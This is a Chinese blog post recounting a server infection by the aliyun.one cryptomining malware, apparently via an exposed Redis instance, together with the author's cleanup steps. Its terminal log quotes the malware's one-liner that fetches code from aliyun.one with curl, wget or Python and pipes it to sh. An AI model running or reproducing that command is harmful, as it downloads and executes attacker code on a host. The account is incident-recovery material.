记录aliyun.one挖矿病毒

莫名其妙就中了挖矿病毒:

WARNING! The remote SSH server rejected X11 forwarding request.
Last login: Sun Apr 26 09:43:15 2020 from XXX.XXX.XXX.XXX
[root@VM_0_9_centos ~]# curl: (6) Could not resolve host: aliyun.one
/etc/bashrc: line 98: wget: command not found
Traceback (most recent call last):
  File "<string>", line 1, in <module>
AttributeError: module 'urllib' has no attribute 'urlopen'

[1]+  Done                    ( curl -fsSL -m180 aliyun.one || wget -q -T180 -O- aliyun.one || python -c 'import urllib;exec(urllib.urlopen("http://aliyun.one/pygo").read())' ) | sh > /dev/null 2>&1

这个病毒十分坑爹 ,他修改了hosts,修改了crontab

而且你是手动修改了 ,马上也会被覆盖

(1)删去wget

(2)删去crontab

yum erase crontab

(3)首先登录的提示根据提示我们先 直接干掉这个:

vim /etc/bashrc

将最后一行的命令 删去

vim /etc/resolv.conf

将被人家串改nameserver删去,改成正常的:

nameserver 114.114.114.114
nameserver 8.8.8.8

 (4)删去/tmp路径下的文件,我是直接全部干掉了,因为这里的数据基本上都是这个挖矿病毒干的。

(5)最坑爹是他直接做了密钥,然后也就是他可以免密 登录这台机器

只能先删去原有的密钥 ,重新生成密钥

cd /root/.ssh
rm  -rf  ./*
ssh-keygen -t rsa
ssh-copy-id -i /root/.ssh/id_rsa.pub root@本机ip

这个家伙也十分的 狡猾,定时在非工作日进行入侵 

(6)删去docker镜像

我 中毒是因为在docker里面使用本机的 Redis,Redis的漏洞,因此我打算删去docker的镜像,但是删去的时候,不断的提示我,还有 容器 在使用这个镜像,反反复复删多还是提示,只能选择强制删去了,不应该有这么多容器占用该镜像文件呀

这个是我的命令历史

docker rmi jhao104/proxy_pool
docker  rm 9e2cdba51b3b
docker rmi jhao104/proxy_pool
docker  rm d2aa2d76fe6b
docker rmi jhao104/proxy_pool
docker  rm 9ca8076f2c93
docker rmi jhao104/proxy_pool
docker  rm 3c08fcadb481
docker rmi jhao104/proxy_poo
docker rmi jhao104/proxy_pool
docker  rm d80507034419
docker rmi jhao104/proxy_pool
docker  rm d4c0a5107fe4
docker rmi jhao104/proxy_pool
docker  rm 0e8e0a760e03
docker images
docker image rm -f 95a9742bf210

不知道啥原因,明明只运行了 一次,不应该出现这么多的容器,现在不知道是不是 病毒造成 的,反正强删就对了

不过这个事情给我的警示是,以后Redis密码设置 复杂一点,端口号不要使用6379

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值
>